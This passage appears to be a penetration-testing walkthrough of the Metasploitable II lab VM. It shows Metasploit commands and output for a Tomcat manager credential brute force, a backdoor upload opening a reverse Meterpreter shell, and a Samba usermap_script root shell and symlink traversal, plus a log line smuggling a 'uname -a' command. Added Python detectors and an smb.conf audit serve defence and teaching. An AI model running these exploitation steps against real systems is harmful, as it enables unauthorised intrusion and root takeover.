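    "Feb  8 10:15:42 metasploitable sshd[4720]: Accepted password for sam from 192.168.56.1 port 50240 ssh2",
]

# Constructed web-server lines: one legitimate include, then the request above
# that pulls auth.log in through the 'page' parameter.
WEB_LOG = [
    '192.168.56.1 - - [08/Feb/2020:10:13:00 -0700] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1200',
    '192.168.56.1 - - [08/Feb/2020:10:13:07 -0700] "GET /dvwa/vulnerabilities/fi/?page=/var/log/auth.log&c=uname%20-a HTTP/1.1" 200 9876',
]

PHP_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)


def poisoned_auth_lines(lines):
    """Log lines carrying a PHP open tag: a planted payload waiting for an
    include() to execute it. Worth alerting on before any LFI request arrives."""
    return [line for line in lines if PHP_TAG.search(line)]


def suspicious_include_requests(lines):
    """Return (client, page value) for requests whose 'page' parameter names an
    absolute path or climbs directories, which no legitimate link does."""
    hits = []
    for line in lines:
        m = re.match(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)', line)
        if not m:
            continue
        client, target = m.groups()
        query = urllib.parse.parse_qs(urllib.parse.urlsplit(target).query)
        for value in query.get("page", []):
            if value.startswith("/") or ".." in value:
                hits.append((client, value))
    return hits


# Application-side fix: map the parameter onto a fixed set of includes instead
# of handing it to include(). The page names here are assumptions.
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}


def resolve_page(page_param):
    """Only a name from the allowlist is ever included; anything else is refused."""
    if page_param not in ALLOWED_PAGES:
        raise ValueError("refusing to include %r" % page_param)
    return page_param


if __name__ == "__main__":
    for line in poisoned_auth_lines(AUTH_LOG):
        print("poisoned:", line)
    for client, value in suspicious_include_requests(WEB_LOG):
        print("LFI attempt from %s: page=%s" % (client, value))
```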

Friday, February 7, 2020

Metasploitable II: Tomcat Manager Upload

First we start off with a brute force of some user and password combinations against the Tomcat server.

msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                Required  Description
   ----              ---------------                                                                --------  -----------
   BLANK_PASSWORDS   false                                                                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                              yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                          no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                          no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                          no        Add all users in the current database to the list
   PASSWORD                                                                                         no        The HTTP password to specify for authentication
   PASS_FILE         /home/sam/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT             8080                                                                           yes       The target port (TCP)
   SSL               false                                                                          no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                          yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                  yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                              yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                         no        The HTTP username to specify for authentication
   USERPASS_FILE     /home/sam/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                          no        Try the username as the password for all users
   USER_FILE         /home/sam/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                           yes       Whether to print output for all attempts
   VHOST                                                                                            no        HTTP server virtual host

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[+] 192.168.56.101:8180 - Login Successful: tomcat:tomcat
[-] 192.168.56.101:8180 - LOGIN FAILED: both:both (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/tomcat_mgr_login) > 

As you can see we got 'Login Successful: tomcat:tomcat' for one of the logins to the remote server. Our next step is to upload a backdoor to the server and get shell access.

msf5 > use exploit/multi/http/tomcat_mgr_upload 
msf5 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat
HttpPassword => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8180
RPORT => 8180
msf5 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying V84r2oLgqHQgPw...
[*] Executing V84r2oLgqHQgPw...
[*] Undeploying V84r2oLgqHQgPw ...
[*] Sending stage (53928 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:55925) at 2020-02-07 12:49:35 -0700

meterpreter > shell
Process 1 created.
Channel 1 created.
id  
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat55@metasploitable:/$ pwd
pwd
/
tomcat55@metasploitable:/$ 

As you can see we now have shell access, from which we could escalate our privileges with some other exploit.
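The brute force above shows up in Tomcat's access log as a burst of 401 responses on /manager/html from one client, followed by a 200 once tomcat:tomcat works. As an added example (not Metasploit's, Tomcat's or this post's code), here is a Python detector that flags that pattern over constructed access-log lines in the AccessLogValve common pattern; the timestamps, the second client and the threshold are assumptions. Removing the default manager account and limiting the manager app to trusted addresses with RemoteAddrValve are the fixes the alert should prompt.

```python
import re
from datetime import datetime, timedelta


def _line(host, user, ts, status):
    """Constructed Tomcat access-log line, "%h %l %u %t "%r" %s %b" pattern."""
    return '%s - %s [%s] "GET /manager/html HTTP/1.1" %d 2473' % (host, user, ts, status)


# Constructed log: eight 401s in nine seconds from 192.168.56.1 ending in a
# 200 as user "tomcat", plus a single stray 401 from another client.
ACCESS_LOG = [_line("192.168.56.1", "-", "07/Feb/2020:12:45:%02d -0700" % s, 401)
              for s in range(1, 9)]
ACCESS_LOG.append(_line("192.168.56.1", "tomcat", "07/Feb/2020:12:45:09 -0700", 200))
ACCESS_LOG.append(_line("10.0.0.5", "-", "07/Feb/2020:12:47:30 -0700", 401))

LOG_LINE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) ')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse(lines):
    """Yield (host, remote user, timestamp, path, status) per parseable line."""
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            host, user, ts, path, status = m.groups()
            yield host, user, datetime.strptime(ts, TIME_FMT), path, int(status)


def detect_manager_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """One alert per client that collects `threshold` or more 401s on the
    manager app inside any `window`. The alert also records the first
    authenticated 200 that followed, i.e. whether a guess succeeded."""
    failures, successes = {}, {}
    for host, user, when, path, status in parse(lines):
        if not path.startswith("/manager"):
            continue
        if status == 401:
            failures.setdefault(host, []).append(when)
        elif status == 200 and user != "-":
            successes.setdefault(host, []).append((when, user))
    alerts = []
    for host, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):          # sliding window over failure times
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                later = [u for (t, u) in successes.get(host, []) if t >= times[end]]
                alerts.append({"client": host, "failures": len(times),
                               "cracked_user": later[0] if later else None})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_manager_bruteforce(ACCESS_LOG):
        print("%(client)s: %(failures)d manager 401s, then login as %(cracked_user)s" % alert)
```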

Metasploitable II: Samba Shares

Let's first start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-07 12:08 MST
Nmap scan report for 192.168.56.101
Host is up (0.00030s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:AA:7E:5A (Oracle VirtualBox virtual NIC)

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-02-07T14:08:36-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds
root@ubuntu:~# 

As you can see both ports are open and the Samba share service is running on the remote host. Our next task is to query the Samba server and try to mount a share.

sam@ubuntu:~$ smbclient -L //192.168.56.101
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\sam's password: 
Anonymous login successful

 Sharename       Type      Comment
 ---------       ----      -------
 print$          Disk      Printer Drivers
 tmp             Disk      oh noes!
 opt             Disk      
 IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
 ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

 Server               Comment
 ---------            -------

 Workgroup            Master
 ---------            -------
 WORKGROUP            
sam@ubuntu:~$ 

We see that there are two shares, tmp and opt. We cannot access opt as it is password protected, but we can mount tmp without a problem.

sam@ubuntu:~$ smbclient //192.168.56.101/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\sam's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Feb  7 12:03:16 2020
  ..                                 DR        0  Sun May 20 13:36:12 2012
  .ICE-unix                          DH        0  Fri Feb  7 11:56:45 2020
  .X11-unix                          DH        0  Fri Feb  7 11:57:08 2020
  .X0-lock                           HR       11  Fri Feb  7 11:57:08 2020
  4529.jsvc_up                        R        0  Fri Feb  7 11:57:21 2020

  7282168 blocks of size 1024. 5436104 blocks available
smb: \> 

There's nothing interesting in the tmp folder, just some temporary files the operating system has put there. Let's move on to exploiting the remote Samba service.

Samba usermap_script

Metasploit gives us a lot of options when attacking the Samba share service. One of those modules, which we will be using here, is the usermap_script module. If all goes well we should get back a shell.

msf5 > use exploit/multi/samba/usermap_script 
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT   139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 192.168.56.1:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo edd61L0j1w8uZUtm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "edd61L0j1w8uZUtm\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:52751) at 2020-02-07 12:01:02 -0700

id
uid=0(root) gid=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# 

As you can see we got back a root shell with this exploit.

Samba Symlink Traversal

Our next task is to exploit the symlink traversal vulnerability. Let's fire up Metasploit and give it a go.

msf5 exploit(multi/samba/usermap_script) > use auxiliary/admin/smb/samba_symlink_traversal
msf5 auxiliary(admin/smb/samba_symlink_traversal) > show options

Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      445              yes       The SMB service port (TCP)
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

msf5 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.56.101
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: SMBSHARE.
msf5 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf5 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.56.101

[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.56.101:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.56.101:445 - Now access the following share to browse the root filesystem:
[*] 192.168.56.101:445 -  \\192.168.56.101\tmp\rootfs\

[*] Auxiliary module execution completed
msf5 auxiliary(admin/smb/samba_symlink_traversal) > 

Now we need to load up the /tmp directory on the samba share and see if the folder 'rootfs' is in the folder.

root@ubuntu:~# smbclient //192.168.56.101/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Feb  7 12:16:32 2020
  ..                                 DR        0  Sun May 20 13:36:12 2012
  .ICE-unix                          DH        0  Fri Feb  7 11:56:45 2020
  .X11-unix                          DH        0  Fri Feb  7 11:57:08 2020
  .X0-lock                           HR       11  Fri Feb  7 11:57:08 2020
  rootfs                             DR        0  Sun May 20 13:36:12 2012
  4529.jsvc_up                        R        0  Fri Feb  7 11:57:21 2020

  7282168 blocks of size 1024. 5436096 blocks available
smb: \> cd rootfs
smb: \rootfs\> ls
  .                                  DR        0  Sun May 20 13:36:12 2012
  ..                                 DR        0  Sun May 20 13:36:12 2012
  initrd                             DR        0  Tue Mar 16 17:57:40 2010
  media                              DR        0  Tue Mar 16 17:55:52 2010
  bin                                DR        0  Sun May 13 22:35:33 2012
  lost+found                         DR        0  Tue Mar 16 17:55:15 2010
  mnt                                DR        0  Wed Apr 28 15:16:56 2010
  sbin                               DR        0  Sun May 13 20:54:53 2012
  initrd.img                          R  7929183  Sun May 13 22:35:56 2012
  home                               DR        0  Fri Apr 16 01:16:02 2010
  lib                                DR        0  Sun May 13 22:35:22 2012
  usr                                DR        0  Tue Apr 27 23:06:37 2010
  proc                               DR        0  Fri Feb  7 11:56:30 2020
  root                               DR        0  Fri Feb  7 11:57:07 2020
  sys                                DR        0  Fri Feb  7 11:56:31 2020
  boot                               DR        0  Sun May 13 22:36:28 2012
  nohup.out                           R     9426  Fri Feb  7 11:57:08 2020
  etc                                DR        0  Fri Feb  7 11:57:02 2020
  dev                                DR        0  Fri Feb  7 11:56:45 2020
  vmlinuz                             R  1987288  Thu Apr 10 11:55:41 2008
  opt                                DR        0  Tue Mar 16 17:57:39 2010
  var                                DR        0  Wed Mar 17 09:08:23 2010
  cdrom                              DR        0  Tue Mar 16 17:55:51 2010
  tmp                                 D        0  Fri Feb  7 12:16:32 2020
  srv                                DR        0  Tue Mar 16 17:57:38 2010

  7282168 blocks of size 1024. 5436096 blocks available
smb: \rootfs\> 

As you can see we got the rootfs folder with the contents of the root filesystem right there for us to browse through.
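The trick above only works because the server lets an anonymous client write a symlink into the share and then follows it outside the share. As an added example (not part of the original post, and not the real Metasploitable smb.conf), here is a small smb.conf audit that flags shares exposed to this: it checks the real Samba parameters `unix extensions`, `wide links`, `follow symlinks` and `writable`/`read only` against their documented defaults, using constructed sample configs.

```python
# Added example, not from the post: audit an smb.conf for the setting
# combination that makes the 'rootfs' symlink trick work. A client can
# only plant a symlink that escapes the share when it can write to the
# share and the server follows symlinks that point outside it.
TRUE_VALUES = {"yes", "true", "1"}

def parse_smb_conf(text):
    """Minimal smb.conf parser -> {section: {param: value}} (all lower-case)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # Samba comment lines
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, val = line.split("=", 1)
            sections[current][" ".join(key.split()).lower()] = val.strip().lower()
    return sections

def effective(share, glob, param, default):
    """Share-level value wins over [global], which wins over the Samba default."""
    return share.get(param, glob.get(param, default)) in TRUE_VALUES

def risky_shares(text):
    """Names of shares where a remote user could link 'rootfs' -> / and browse it."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    # 'unix extensions' (global only, default yes) lets clients create symlinks.
    unix_ext = glob.get("unix extensions", "yes") in TRUE_VALUES
    risky = []
    for name, share in conf.items():
        if name in ("global", "printers", "print$"):
            continue
        writable = (effective(share, glob, "writable", "no")
                    or effective(share, glob, "writeable", "no")
                    or share.get("read only", glob.get("read only", "yes")) not in TRUE_VALUES)
        # Samba defaults: wide links = no, follow symlinks = yes
        if (unix_ext and writable and effective(share, glob, "wide links", "no")
                and effective(share, glob, "follow symlinks", "yes")):
            risky.append(name)
    return risky

# Constructed sample configs (not the real Metasploitable smb.conf).
WEAK_CONF = """
[global]
   workgroup = WORKGROUP
   wide links = yes
[tmp]
   path = /tmp
   guest ok = yes
   writable = yes
"""
HARDENED_CONF = WEAK_CONF.replace("wide links = yes", "wide links = no")
```

Setting `wide links = no` (or turning off `unix extensions`) removes the share from the risky list; current Samba releases already ignore `wide links = yes` when `unix extensions` is on, so this audit mainly matters for old builds like the one in Metasploitable.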

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...